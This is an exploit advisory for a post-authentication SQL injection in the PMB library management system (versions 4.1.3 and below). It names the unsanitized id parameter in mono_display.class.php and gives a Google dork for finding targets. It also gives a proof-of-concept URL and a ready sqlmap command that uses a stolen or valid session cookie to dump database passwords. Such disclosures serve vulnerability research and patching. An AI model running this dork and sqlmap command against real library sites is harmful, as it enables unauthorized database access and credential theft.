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PMB 4.1.3 SQL Injection

PMB 4.1.3 SQL Injection
Posted Dec 26, 2014
Authored by XD4rker

PMB versions 4.1.3 and below suffer from a post-authentication remote SQL injection vulnerability.

tags | exploit, remote, sql injection
SHA-256 | 4112c15c38b2be94b91730fd23a5f55b1e28c7e02c07a320a95e622b612f4220

PMB 4.1.3 SQL Injection

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# Exploit Title: PMB <= 4.1.3 Post-Auth SQL Injection Vulnerability
# Google Dork: inurl:opac_css
# Date: 25-12-2014
# Exploit Author: XD4rker (Ismail Belkacim)
# Email: xd4rker[at]gmail.com
# Twitter: @xd4rker
# Vendor Homepage: http://www.sigb.net
# Software Link: http://forge.sigb.net/redmine/projects/pmb/files
# Affected versions: <= 4.1.3 (Tested against version 4.1.3, 4.1.2 and 3.4.16)
# Category: webapps (php)

-==== Software Description ====-

PMB is a completely free ILS (Integrated Library management System). The domain of software for libraries is almost exclusively occupied by proprietary products.
We are some librarians, users and developers deploring this state of affairs.
 
PMB is based on web technology. This is what we sometimes call a 'web-app'.
PMB requires an HTTP server (such as Apache, but this is not an obligation), the MySQL database and the PHP language.
 
The main functions of PMB are :
 
    * Supporting the UNIMARC format
    * Authorities management (authors, publishers, series, subjects...)
    * Management of loans, holds, borrowers...
    * A user-friendly configuration
    * The ability to import full bibliographic records
    * A user-friendly OPAC integrating a browser
    * Loans management with a module designed to serve even the very small establishments
    * Serials management
    * Simple administration procedures that can be handled easily even by the library staff...

-==== Vulnerability ====-

Variable $notice_id isn't properly sanitized in file classes/mono_display.class.php, which allows authenticated users to execute arbitrary SQL commands via the id parameter.

-==== POC ====-

http://localhost/[PMB_PATH]/catalog.php?categ=isbd&id=9 [SQLI]

Using SQLMAP :

./sqlmap.py -u "http://localhost/[PMB_PATH]/catalog.php?categ=isbd&id=9" -p id --headers="Cookie: [VALID_USER_COOKIE]" --passwords

-==== Exploit requirements ====-

- You will need to be logged in in order to exploit the vulnerability.
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